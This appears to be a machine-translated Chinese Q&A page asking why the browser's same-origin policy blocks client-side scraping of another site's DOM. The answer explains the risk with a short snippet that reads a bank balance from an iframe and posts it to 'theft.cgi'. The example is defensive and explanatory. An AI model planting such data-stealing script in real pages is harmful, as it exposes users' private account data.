![](/img/trans.png)
[英]How to show the data user is filling in a form in html side by side on the same html page?
[英]Same Origin Policy Purpose | User Data vs. Basic Page Data | Client Side Page Scrapes
我想在客户端而不是服务器端抓取页面。 但是,同源政策阻止了我这样做。
我想了解的是为什么我没有对另一个站点的DOM的只读访问权限。
如果我可以通过将页面拉到服务器上并以任何方式访问它来获得相同的信息,那么这会对网站造成什么安全风险。
我只想从以下页面提取基本信息:
document.title
如果我可以在服务端这样做,为什么不在客户端? 主要区别是我不想支付额外的往返费用吗?
显然,用户的数据不应该访问,这很明显,我不需要任何信息。 但是以同样的方式,我可以使用
file_get_contents
并解析DOM,我想做客户端。
不允许JavaScript确定...授予对用户定义数据的访问权限与通用页面数据访问权限之间的区别是什么?
PHP可以做到。
为什么不能使用JavaScript?
有什么限制?
我不想绕开它或破解它,但是更好地了解了它的用途,也许发现它不适用于我有...页面刮擦客户端的情况
有关
服务器如何验证小书签(链接中的javascript)? 如何保持安全性?
http://zh.wikipedia.org/wiki/Representationalal_state_transfer#Central_principle
为什么我没有对另一个站点的DOM的只读访问权限
您的用户可以在任何给定站点上访问的数据可能与您在该站点上可以访问的数据不同。
由于可能通过包括IP地址在内的各种事物来识别用户,因此浏览器无法清除所有个人信息的数据。
过于简单的插图:
<iframe src="your bank" id="frame"></iframe>
<script>
var bank = document.getElementById('frame').contentDocument;
var stolen = bank.getElementById('account_balance').innerText;
ajax('theft.cgi', stolen);
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.